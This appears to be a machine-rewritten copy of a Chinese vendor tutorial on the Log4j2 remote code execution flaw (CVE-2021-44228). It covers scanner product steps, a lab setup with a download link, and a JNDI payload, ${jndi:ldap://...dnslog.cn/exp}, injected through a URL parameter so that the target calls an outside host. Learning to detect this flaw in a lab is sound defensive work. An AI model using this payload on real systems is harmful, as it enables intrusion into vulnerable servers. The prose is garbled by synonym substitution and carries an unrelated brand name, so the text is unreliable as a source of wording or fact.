js1996官网

20240102091203_3478数字经济的安全基石

download_banner

产品技术

首页 > 资源中心 > 知识中心 > 产品技术 > 正文

玩转Log4j2远程代码执行缝隙,js1996官网明鉴保姆级教程


2021.12.10,一个平平无奇的脱发日,忽然老板来了新闻。

20220307141243_3445


工具发现

明鉴缝隙扫描系统

js1996官网明鉴漏扫产品第一功夫已具备对该缝隙的扫描与检测能力,凭据产品通知,将网站扫描战术升级至V1.3.582.534版本,起头做扫描工作。


1、新建战术模板,单独选择Apache Log4j 2远程代码执行扫描战术

20220307141243_6458


2、新建扫描工作,选择对应战术模板并提交工作。

20220307141243_7864


3、由于只针对这一个缝隙做应急扫描,工作很快执行实现,查看扫描了局,成功发现缝隙!

20220307141243_9270


明鉴Web利用弱点扫描器

将战术库版本升级至V6.1.117版本,即可具备Apache Log4j 2远程代码执行(CVE-2021-44228)缝隙发现能力。


1、新建工作填写扫描指标。

20220307141244_0208


2、选择自界说战术,勾选Apache Log4j远程代码执行(CVE-2021-44228)扫描战术。

20220307141244_1736


3、待工作执行实现后,查看扫描了局。仍旧发现,从工具中导出汇报交给辅导就能交差了!

20220307141244_3923


顺利实现工作,不外这个波及宽泛的Apache Log4j2 远程代码执行缝隙到底是啥,作为幼白有必要一探到底。


环境搭建

服务器环境

操作系统:centos7.7

JAVA环境:JDK1.8

Centos7.7装置教程:

https://www.cnblogs.com/weihengblogs/p/13724167.html

JAVA环境部署教程:

https://www.cnblogs.com/stulzq/p/9286878.html


缝隙环境获取

获取地址:

https://pan.www.skylettestudio.com/s/12ftEpSFnOjjITGlWNbl84w

提取码:r5pk?


后盾启用Log4j2缝隙环境


nohupjava-jarspringboot-log4j2-demo-0.0.1-SNAPSHOT.jar&20220307141244_4864


接见环境

缝隙环境的Web服务监听8082端口,param参数会挪用log4j。这时要求一下该参数,确认环境是否正常。

http://X.X.X.X:8082/test?param=1

20220307141244_7830


缝隙验证

通过dnslog.cn获取dnslog子域

20220307141244_8611


机关payload


${jndi:ldap://fj537p.dnslog.cn/exp}


带入payload要求验证dns接见


http://X.X.X.X:8082/test?param=${jndi:ldap://fj537p.dnslog.cn/exp}20220307141244_9861


查看dnslog回显

20220307141245_0486

看到这个回显就证明缝隙存在了。若是没有工具借助,按此步骤来也可能验证。但若想急剧便捷地大批量进行验证,还是必要采办专业缝隙扫描类产品,终于下一个高危缝隙发作咱也不知路好不好手工验证。

20240102184719_8730

与专家在线沟通, 免费获取专业解决规划

线上征询
commrr_dot02commrr_dot02on 联系js1996官网

征询电话:400-6059-110

commrr_dot04 commrr_dot04on 产品试用

即刻预约免费试用,我们将在24幼时内联系您

微信征询
20240102184733_7796
commrr_top
【网站地图】